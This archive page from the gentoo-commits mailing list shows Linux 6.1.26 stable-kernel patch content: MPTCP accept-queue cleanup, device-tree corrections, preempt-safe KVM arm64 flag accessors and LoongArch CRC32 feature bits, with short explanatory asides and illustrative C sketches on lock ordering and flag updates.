++	bool dispose_it, need_push = false;
++
++	/* If the first subflow moved to a close state before accept, e.g. due
++	 * to an incoming reset, mptcp either:
++	 * - if either the subflow or the msk are dead, destroy the context
++	 *   (the subflow socket is deleted by inet_child_forget) and the msk
++	 * - otherwise do nothing at the moment and take action at accept and/or
++	 *   listener shutdown - user-space must be able to accept() the closed
++	 *   socket.
++	 */
++	if (msk->in_accept_queue && msk->first == ssk) {
++		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
++			return;
++
++		/* ensure later check in mptcp_worker() will dispose the msk */
++		sock_set_flag(sk, SOCK_DEAD);
++		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++		mptcp_subflow_drop_ctx(ssk);
++		goto out_release;
++	}
+ 
+ 	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
+ 	if (dispose_it)
+@@ -2366,25 +2385,21 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
+ 		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
+-	} else if (msk->in_accept_queue && msk->first == ssk) {
+-		/* if the first subflow moved to a close state, e.g. due to
+-		 * incoming reset and we reach here before inet_child_forget()
+-		 * the TCP stack could later try to close it via
+-		 * inet_csk_listen_stop(), or deliver it to the user space via
+-		 * accept().
+-		 * We can't delete the subflow - or risk a double free - nor let
+-		 * the msk survive - or will be leaked in the non accept scenario:
+-		 * fallback and let TCP cope with the subflow cleanup.
+-		 */
+-		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
+-		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
++		if (ssk->sk_state == TCP_LISTEN) {
++			tcp_set_state(ssk, TCP_CLOSE);
++			mptcp_subflow_queue_clean(sk, ssk);
++			inet_csk_listen_stop(ssk);
++		}
++
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+ 		__sock_put(ssk);
+ 	}
++
++out_release:
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2439,21 +2454,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 	}
+ 
+-	/* if the MPC subflow has been closed before the msk is accepted,
+-	 * msk will never be accept-ed, close it now
+-	 */
+-	if (!msk->first && msk->in_accept_queue) {
+-		sock_set_flag(sk, SOCK_DEAD);
+-		inet_sk_state_store(sk, TCP_CLOSE);
+-	}
+ }
+ 
+-static bool mptcp_check_close_timeout(const struct sock *sk)
++static bool mptcp_should_close(const struct sock *sk)
+ {
+ 	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	if (delta >= TCP_TIMEWAIT_LEN)
++	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+ 		return true;
+ 
+ 	/* if all subflows are in closed status don't bother with additional
+@@ -2661,7 +2669,7 @@ static void mptcp_worker(struct work_struct *work)
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+ 	 */
+ 	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_check_close_timeout(sk)) {
++		if (mptcp_should_close(sk)) {
+ 			inet_sk_state_store(sk, TCP_CLOSE);
+ 			mptcp_do_fastclose(sk);
+ 		}
+@@ -2906,6 +2914,14 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 	sock_put(sk);
+ }
+ 
++void __mptcp_unaccepted_force_close(struct sock *sk)
++{
++	sock_set_flag(sk, SOCK_DEAD);
++	inet_sk_state_store(sk, TCP_CLOSE);
++	mptcp_do_fastclose(sk);
++	__mptcp_destroy_sock(sk);
++}
++
+ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ {
+ 	/* Concurrent splices from sk_receive_queue into receive_queue will
+@@ -3753,6 +3769,18 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 			if (!ssk->sk_socket)
+ 				mptcp_sock_graft(ssk, newsock);
+ 		}
++
++		/* Do late cleanup for the first subflow as necessary. Also
++		 * deal with bad peers not doing a complete shutdown.
++		 */
++		if (msk->first &&
++		    unlikely(inet_sk_state_load(msk->first) == TCP_CLOSE)) {
++			__mptcp_close_ssk(newsk, msk->first,
++					  mptcp_subflow_ctx(msk->first), 0);
++			if (unlikely(list_empty(&msk->conn_list)))
++				inet_sk_state_store(newsk, TCP_CLOSE);
++		}
++
+ 		release_sock(newsk);
+ 	}
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 051e8022d6611..441feeaeb2427 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -615,10 +615,12 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+ void mptcp_cancel_work(struct sock *sk);
++void __mptcp_unaccepted_force_close(struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 			   const struct mptcp_addr_info *b, bool use_port);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 125d1f58d6a43..67ddbf6f2e4ee 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -661,9 +661,12 @@ void mptcp_subflow_drop_ctx(struct sock *ssk)
+ 	if (!ctx)
+ 		return;
+ 
+-	subflow_ulp_fallback(ssk, ctx);
+-	if (ctx->conn)
+-		sock_put(ctx->conn);
++	list_del(&mptcp_subflow_ctx(ssk)->node);
++	if (inet_csk(ssk)->icsk_ulp_ops) {
++		subflow_ulp_fallback(ssk, ctx);
++		if (ctx->conn)
++			sock_put(ctx->conn);
++	}
+ 
+ 	kfree_rcu(ctx, rcu);
+ }
+@@ -1758,6 +1761,77 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
++{
++	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
++	struct mptcp_sock *msk, *next, *head = NULL;
++	struct request_sock *req;
++	struct sock *sk;
++
++	/* build a list of all unaccepted mptcp sockets */
++	spin_lock_bh(&queue->rskq_lock);
++	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
++		struct mptcp_subflow_context *subflow;
++		struct sock *ssk = req->sk;
++
++		if (!sk_is_mptcp(ssk))
++			continue;
++
++		subflow = mptcp_subflow_ctx(ssk);
++		if (!subflow || !subflow->conn)
++			continue;
++
++		/* skip if already in list */
++		sk = subflow->conn;
++		msk = mptcp_sk(sk);
++		if (msk->dl_next || msk == head)
++			continue;
++
++		sock_hold(sk);
++		msk->dl_next = head;
++		head = msk;
++	}
++	spin_unlock_bh(&queue->rskq_lock);
++	if (!head)
++		return;
++
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (msk = head; msk; msk = next) {
++		sk = (struct sock *)msk;
++
++		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
++		next = msk->dl_next;
++		msk->dl_next = NULL;
++
++		__mptcp_unaccepted_force_close(sk);
++		release_sock(sk);
++
++		/* lockdep will report a false positive ABBA deadlock
++		 * between cancel_work_sync and the listener socket.
++		 * The involved locks belong to different sockets WRT
++		 * the existing AB chain.
++		 * Using a per socket key is problematic as key
++		 * deregistration requires process context and must be
++		 * performed at socket disposal time, in atomic
++		 * context.
++		 * Just tell lockdep to consider the listener socket
++		 * released here.
++		 */
++		mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
++		mptcp_cancel_work(sk);
++		mutex_acquire(&listener_sk->sk_lock.dep_map, 0, 0, _RET_IP_);
++
++		sock_put(sk);
++	}
++
++	/* we are still under the listener msk socket lock */
++	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++}
++
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
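
The mptcp_subflow_queue_clean() function added above follows a classic kernel lock-ordering pattern: pin every target with sock_hold() while holding the queue spinlock, drop the spinlock, and only then take each sleeping socket lock, so the msk lock is never nested inside the accept-queue lock. The patch threads an intrusive msk->dl_next chain to avoid allocating during collection; the sketch below uses a bounded array instead, purely for illustration:

#include <linux/lockdep.h>
#include <net/sock.h>

/* Collect-then-process, illustrative only. Never take the sleeping
 * socket lock while holding the queue spinlock: that would invert
 * the established lock order and invite an ABBA deadlock. */
static void drain_sockets(spinlock_t *qlock, struct sock **queue, int n)
{
	struct sock *pending[32];	/* hypothetical upper bound */
	int i, cnt = 0;

	spin_lock_bh(qlock);		/* atomic phase: only collect */
	for (i = 0; i < n && cnt < 32; i++) {
		sock_hold(queue[i]);	/* pin across the unlock */
		pending[cnt++] = queue[i];
	}
	spin_unlock_bh(qlock);

	for (i = 0; i < cnt; i++) {	/* sleeping phase: process */
		lock_sock_nested(pending[i], SINGLE_DEPTH_NESTING);
		/* ... per-socket cleanup ... */
		release_sock(pending[i]);
		sock_put(pending[i]);
	}
}
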


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-26 13:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-04-26 13:19 UTC (permalink / raw
  To: gentoo-commits

commit:     9d02faaed4123c2992080e3366d6b7caa044c9ce
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 26 13:19:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 26 13:19:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9d02faae

Linux patch 6.1.26

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1025_linux-6.1.26.patch | 3310 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3314 insertions(+)

diff --git a/0000_README b/0000_README
index 7c4d9865..2dab4c18 100644
--- a/0000_README
+++ b/0000_README
@@ -143,6 +143,10 @@ Patch:  1024_linux-6.1.25.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.25
 
+Patch:  1025_linux-6.1.26.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.26
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1025_linux-6.1.26.patch b/1025_linux-6.1.26.patch
new file mode 100644
index 00000000..f8f558ac
--- /dev/null
+++ b/1025_linux-6.1.26.patch
@@ -0,0 +1,3310 @@
+diff --git a/Makefile b/Makefile
+index 1a4c4af370db8..d2eff3747f2f7 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 25
++SUBLEVEL = 26
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 2ca76b69add78..511ca864c1b2d 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -942,7 +942,7 @@
+ 		status = "disabled";
+ 	};
+ 
+-	spdif: sound@ff88b0000 {
++	spdif: sound@ff8b0000 {
+ 		compatible = "rockchip,rk3288-spdif", "rockchip,rk3066-spdif";
+ 		reg = <0x0 0xff8b0000 0x0 0x10000>;
+ 		#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 131a8a5a9f5a0..88b848c65b0d2 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1571,10 +1571,9 @@
+ 
+ 			dmc: bus@38000 {
+ 				compatible = "simple-bus";
+-				reg = <0x0 0x38000 0x0 0x400>;
+ 				#address-cells = <2>;
+ 				#size-cells = <2>;
+-				ranges = <0x0 0x0 0x0 0x38000 0x0 0x400>;
++				ranges = <0x0 0x0 0x0 0x38000 0x0 0x2000>;
+ 
+ 				canvas: video-lut@48 {
+ 					compatible = "amlogic,canvas";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+index 7d6317d95b131..1dd0617477fdf 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+@@ -193,7 +193,7 @@
+ 		rohm,reset-snvs-powered;
+ 
+ 		#clock-cells = <0>;
+-		clocks = <&osc_32k 0>;
++		clocks = <&osc_32k>;
+ 		clock-output-names = "clk-32k-out";
+ 
+ 		regulators {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index 59445f916d7fa..b4aef79650c69 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -95,7 +95,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -135,7 +135,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio3 5 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+index cefabe65b2520..c8b521d45fca1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+@@ -12,7 +12,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio_expander_21 4 GPIO_ACTIVE_HIGH>; /* ETH_PWR_EN */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-name = "+V3.3_ETH";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+index 5dcd1de586b52..371144eb40188 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+@@ -86,7 +86,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -127,7 +127,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio4 22 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+index 7143c936de61e..bb0a838891f64 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+@@ -59,11 +59,11 @@
+ 	perst-gpios = <&tlmm 58 0x1>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+index db4b87944cdf2..a695686afadfc 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+@@ -22,7 +22,7 @@
+ };
+ 
+ &blsp1_spi1 {
+-	status = "ok";
++	status = "okay";
+ 
+ 	flash@0 {
+ 		#address-cells = <1>;
+@@ -34,33 +34,33 @@
+ };
+ 
+ &blsp1_uart5 {
+-	status = "ok";
++	status = "okay";
+ };
+ 
+ &pcie0 {
+-	status = "ok";
++	status = "okay";
+ 	perst-gpios = <&tlmm 58 0x1>;
+ };
+ 
+ &pcie1 {
+-	status = "ok";
++	status = "okay";
+ 	perst-gpios = <&tlmm 61 0x1>;
+ };
+ 
+-&pcie_phy0 {
+-	status = "ok";
++&pcie_qmp0 {
++	status = "okay";
+ };
+ 
+-&pcie_phy1 {
+-	status = "ok";
++&pcie_qmp1 {
++	status = "okay";
+ };
+ 
+ &qpic_bam {
+-	status = "ok";
++	status = "okay";
+ };
+ 
+ &qpic_nand {
+-	status = "ok";
++	status = "okay";
+ 
+ 	nand@0 {
+ 		reg = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+index 24836b6b9bbc9..be0df0856df9b 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+@@ -15,8 +15,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8280_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pmk8280_pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index 5bcd4be329643..4d494b53a71ab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -540,7 +540,7 @@
+ 	non-removable;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc1_bus4 &sdmmc1_cmd &sdmmc1_clk>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sys>;
+ 	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 45e2136322ba2..e2b45c937c58a 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -449,9 +449,22 @@ struct kvm_vcpu_arch {
+ 	({							\
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+-		v->arch.flagset & (m);				\
++		READ_ONCE(v->arch.flagset) & (m);		\
+ 	})
+ 
++/*
++ * Note that the set/clear accessors must be preempt-safe in order to
++ * avoid nesting them with load/put which also manipulate flags...
++ */
++#ifdef __KVM_NVHE_HYPERVISOR__
++/* the nVHE hypervisor is always non-preemptible */
++#define __vcpu_flags_preempt_disable()
++#define __vcpu_flags_preempt_enable()
++#else
++#define __vcpu_flags_preempt_disable()	preempt_disable()
++#define __vcpu_flags_preempt_enable()	preempt_enable()
++#endif
++
+ #define __vcpu_set_flag(v, flagset, f, m)			\
+ 	do {							\
+ 		typeof(v->arch.flagset) *fset;			\
+@@ -459,9 +472,11 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		if (HWEIGHT(m) > 1)				\
+ 			*fset &= ~(m);				\
+ 		*fset |= (f);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define __vcpu_clear_flag(v, flagset, f, m)			\
+@@ -471,7 +486,9 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		*fset &= ~(m);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define vcpu_get_flag(v, ...)	__vcpu_get_flag((v), __VA_ARGS__)
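
These macros turn an unguarded read-modify-write of the flag word into a preemption-safe one, and give readers a READ_ONCE() so the load is neither torn nor re-issued. The same discipline on a bare flag word, as a minimal sketch (not the KVM macros themselves):

#include <linux/compiler.h>
#include <linux/preempt.h>
#include <linux/types.h>

static unsigned long flags_word;	/* shared with a preempting context */

static void flag_set(unsigned long f)
{
	preempt_disable();		/* RMW can't interleave with load/put */
	flags_word |= f;
	preempt_enable();
}

static void flag_clear(unsigned long m)
{
	preempt_disable();
	flags_word &= ~m;
	preempt_enable();
}

static bool flag_test(unsigned long m)
{
	return READ_ONCE(flags_word) & m;	/* one untorn load */
}
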
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index c9f401fa01a93..950e35b993d2b 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -397,6 +397,8 @@ int kvm_arm_set_fw_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	u64 val;
+ 	int wa_level;
+ 
++	if (KVM_REG_SIZE(reg->id) != sizeof(val))
++		return -ENOENT;
+ 	if (copy_from_user(&val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+diff --git a/arch/loongarch/include/asm/cpu-features.h b/arch/loongarch/include/asm/cpu-features.h
+index b07974218393d..f6177f1334776 100644
+--- a/arch/loongarch/include/asm/cpu-features.h
++++ b/arch/loongarch/include/asm/cpu-features.h
+@@ -42,6 +42,7 @@
+ #define cpu_has_fpu		cpu_opt(LOONGARCH_CPU_FPU)
+ #define cpu_has_lsx		cpu_opt(LOONGARCH_CPU_LSX)
+ #define cpu_has_lasx		cpu_opt(LOONGARCH_CPU_LASX)
++#define cpu_has_crc32		cpu_opt(LOONGARCH_CPU_CRC32)
+ #define cpu_has_complex		cpu_opt(LOONGARCH_CPU_COMPLEX)
+ #define cpu_has_crypto		cpu_opt(LOONGARCH_CPU_CRYPTO)
+ #define cpu_has_lvz		cpu_opt(LOONGARCH_CPU_LVZ)
+diff --git a/arch/loongarch/include/asm/cpu.h b/arch/loongarch/include/asm/cpu.h
+index 754f285067913..9275770552636 100644
+--- a/arch/loongarch/include/asm/cpu.h
++++ b/arch/loongarch/include/asm/cpu.h
+@@ -78,25 +78,26 @@ enum cpu_type_enum {
+ #define CPU_FEATURE_FPU			3	/* CPU has FPU */
+ #define CPU_FEATURE_LSX			4	/* CPU has LSX (128-bit SIMD) */
+ #define CPU_FEATURE_LASX		5	/* CPU has LASX (256-bit SIMD) */
+-#define CPU_FEATURE_COMPLEX		6	/* CPU has Complex instructions */
+-#define CPU_FEATURE_CRYPTO		7	/* CPU has Crypto instructions */
+-#define CPU_FEATURE_LVZ			8	/* CPU has Virtualization extension */
+-#define CPU_FEATURE_LBT_X86		9	/* CPU has X86 Binary Translation */
+-#define CPU_FEATURE_LBT_ARM		10	/* CPU has ARM Binary Translation */
+-#define CPU_FEATURE_LBT_MIPS		11	/* CPU has MIPS Binary Translation */
+-#define CPU_FEATURE_TLB			12	/* CPU has TLB */
+-#define CPU_FEATURE_CSR			13	/* CPU has CSR */
+-#define CPU_FEATURE_WATCH		14	/* CPU has watchpoint registers */
+-#define CPU_FEATURE_VINT		15	/* CPU has vectored interrupts */
+-#define CPU_FEATURE_CSRIPI		16	/* CPU has CSR-IPI */
+-#define CPU_FEATURE_EXTIOI		17	/* CPU has EXT-IOI */
+-#define CPU_FEATURE_PREFETCH		18	/* CPU has prefetch instructions */
+-#define CPU_FEATURE_PMP			19	/* CPU has perfermance counter */
+-#define CPU_FEATURE_SCALEFREQ		20	/* CPU supports cpufreq scaling */
+-#define CPU_FEATURE_FLATMODE		21	/* CPU has flat mode */
+-#define CPU_FEATURE_EIODECODE		22	/* CPU has EXTIOI interrupt pin decode mode */
+-#define CPU_FEATURE_GUESTID		23	/* CPU has GuestID feature */
+-#define CPU_FEATURE_HYPERVISOR		24	/* CPU has hypervisor (running in VM) */
++#define CPU_FEATURE_CRC32		6	/* CPU has CRC32 instructions */
++#define CPU_FEATURE_COMPLEX		7	/* CPU has Complex instructions */
++#define CPU_FEATURE_CRYPTO		8	/* CPU has Crypto instructions */
++#define CPU_FEATURE_LVZ			9	/* CPU has Virtualization extension */
++#define CPU_FEATURE_LBT_X86		10	/* CPU has X86 Binary Translation */
++#define CPU_FEATURE_LBT_ARM		11	/* CPU has ARM Binary Translation */
++#define CPU_FEATURE_LBT_MIPS		12	/* CPU has MIPS Binary Translation */
++#define CPU_FEATURE_TLB			13	/* CPU has TLB */
++#define CPU_FEATURE_CSR			14	/* CPU has CSR */
++#define CPU_FEATURE_WATCH		15	/* CPU has watchpoint registers */
++#define CPU_FEATURE_VINT		16	/* CPU has vectored interrupts */
++#define CPU_FEATURE_CSRIPI		17	/* CPU has CSR-IPI */
++#define CPU_FEATURE_EXTIOI		18	/* CPU has EXT-IOI */
++#define CPU_FEATURE_PREFETCH		19	/* CPU has prefetch instructions */
++#define CPU_FEATURE_PMP			20	/* CPU has perfermance counter */
++#define CPU_FEATURE_SCALEFREQ		21	/* CPU supports cpufreq scaling */
++#define CPU_FEATURE_FLATMODE		22	/* CPU has flat mode */
++#define CPU_FEATURE_EIODECODE		23	/* CPU has EXTIOI interrupt pin decode mode */
++#define CPU_FEATURE_GUESTID		24	/* CPU has GuestID feature */
++#define CPU_FEATURE_HYPERVISOR		25	/* CPU has hypervisor (running in VM) */
+ 
+ #define LOONGARCH_CPU_CPUCFG		BIT_ULL(CPU_FEATURE_CPUCFG)
+ #define LOONGARCH_CPU_LAM		BIT_ULL(CPU_FEATURE_LAM)
+@@ -104,6 +105,7 @@ enum cpu_type_enum {
+ #define LOONGARCH_CPU_FPU		BIT_ULL(CPU_FEATURE_FPU)
+ #define LOONGARCH_CPU_LSX		BIT_ULL(CPU_FEATURE_LSX)
+ #define LOONGARCH_CPU_LASX		BIT_ULL(CPU_FEATURE_LASX)
++#define LOONGARCH_CPU_CRC32		BIT_ULL(CPU_FEATURE_CRC32)
+ #define LOONGARCH_CPU_COMPLEX		BIT_ULL(CPU_FEATURE_COMPLEX)
+ #define LOONGARCH_CPU_CRYPTO		BIT_ULL(CPU_FEATURE_CRYPTO)
+ #define LOONGARCH_CPU_LVZ		BIT_ULL(CPU_FEATURE_LVZ)
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 7f8d57a61c8bd..62835d84a647d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -117,7 +117,7 @@ static inline u32 read_cpucfg(u32 reg)
+ #define  CPUCFG1_EP			BIT(22)
+ #define  CPUCFG1_RPLV			BIT(23)
+ #define  CPUCFG1_HUGEPG			BIT(24)
+-#define  CPUCFG1_IOCSRBRD		BIT(25)
++#define  CPUCFG1_CRC32			BIT(25)
+ #define  CPUCFG1_MSGINT			BIT(26)
+ 
+ #define LOONGARCH_CPUCFG2		0x2
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 3a3fce2d78461..5adf0f736c6d7 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -60,7 +60,7 @@ static inline void set_elf_platform(int cpu, const char *plat)
+ 
+ /* MAP BASE */
+ unsigned long vm_map_base;
+-EXPORT_SYMBOL_GPL(vm_map_base);
++EXPORT_SYMBOL(vm_map_base);
+ 
+ static void cpu_probe_addrbits(struct cpuinfo_loongarch *c)
+ {
+@@ -94,13 +94,18 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG;
+ 
